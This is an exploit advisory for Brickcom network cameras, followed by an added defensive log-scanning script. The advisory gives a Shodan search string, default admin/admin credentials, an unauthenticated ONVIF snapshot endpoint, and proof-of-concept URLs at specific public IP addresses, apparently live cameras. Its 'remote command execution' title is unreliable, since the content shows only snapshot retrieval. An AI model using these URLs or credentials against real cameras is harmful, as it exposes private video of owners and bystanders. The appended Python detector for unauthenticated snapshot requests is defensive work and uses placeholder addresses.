Brickcom Camera - Remote command execution

2026.02.26
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Brickcom Camera - Remote command execution
# Date: 2/26/2026
# Google Dork: In Shodan search engine, the filter is --> realm="Brickcom"
# Exploit Author: parsa rezaie khiabanloo
# Tested on: Windows/Linux/Android

# 1. Description:

All Brickcom versions use admin as both username and password, and they expose the RCE snapshot without authentication.

Exploit : /ONVIF/media.cgi?action=getSnapshot&channel=1
Exploit : ONVIF/media.cgi?action=getSnapshot

# 2. Proof of Concept:

Retrieve a camera snapshot without authentication:

http://2.81.165.52:5000/ONVIF/media.cgi?action=getSnapshot&channel=1
http://109.89.253.56:10001/ONVIF/media.cgi?action=getSnapshot
http://80.123.193.122:10101/ONVIF/media.cgi?action=getSnapshot
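A defender-side check for the exposure described above, as an added example that is not part of the original advisory: it scans access logs for getSnapshot requests that were served without an authenticated user. It assumes a reverse proxy in front of the camera that writes combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_snapshot_request(target):
    """True if the request target is the ONVIF getSnapshot call named in the advisory."""
    parts = urlsplit(target)
    # Collapse duplicate slashes and ignore case so trivial variations still match
    # (a conservative detection choice, not a statement about how the camera parses URLs).
    path = re.sub(r'/+', '/', parts.path).lower()
    if path != '/onvif/media.cgi':
        return False
    actions = parse_qs(parts.query).get('action', [])
    return any(a.lower() == 'getsnapshot' for a in actions)

def find_unauthenticated_snapshots(lines):
    """Return (source, timestamp, target) for snapshot requests served with no authenticated user."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_snapshot_request(m['target']):
            continue
        # user "-" means the proxy saw no authenticated user; 2xx means the image was served
        if m['user'] == '-' and m['status'].startswith('2'):
            hits.append((m['src'], m['ts'], m['target']))
    return hits

# Constructed sample log lines (documentation address ranges), not real traffic
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Feb/2026:10:01:02 +0000] "GET /ONVIF/media.cgi?action=getSnapshot&channel=1 HTTP/1.1" 200 48211 "-" "curl/8.5.0"',
    '198.51.100.7 - - [26/Feb/2026:10:01:05 +0000] "GET /ONVIF/media.cgi?action=getSnapshot HTTP/1.1" 401 0 "-" "curl/8.5.0"',
    '192.0.2.10 - operator [26/Feb/2026:10:02:00 +0000] "GET /ONVIF/media.cgi?action=getSnapshot HTTP/1.1" 200 47990 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Feb/2026:10:03:10 +0000] "GET /onvif//media.cgi?channel=1&action=getsnapshot HTTP/1.1" 200 48002 "-" "python-requests/2.31"',
    '203.0.113.9 - - [26/Feb/2026:10:03:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "python-requests/2.31"',
]

if __name__ == '__main__':
    for src, ts, target in find_unauthenticated_snapshots(SAMPLE_LOG):
        print(f'{ts} {src} unauthenticated snapshot served: {target}')
```

A hit means the snapshot was returned to a client that presented no credentials; the 401 line and the authenticated `operator` line are deliberately not flagged.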

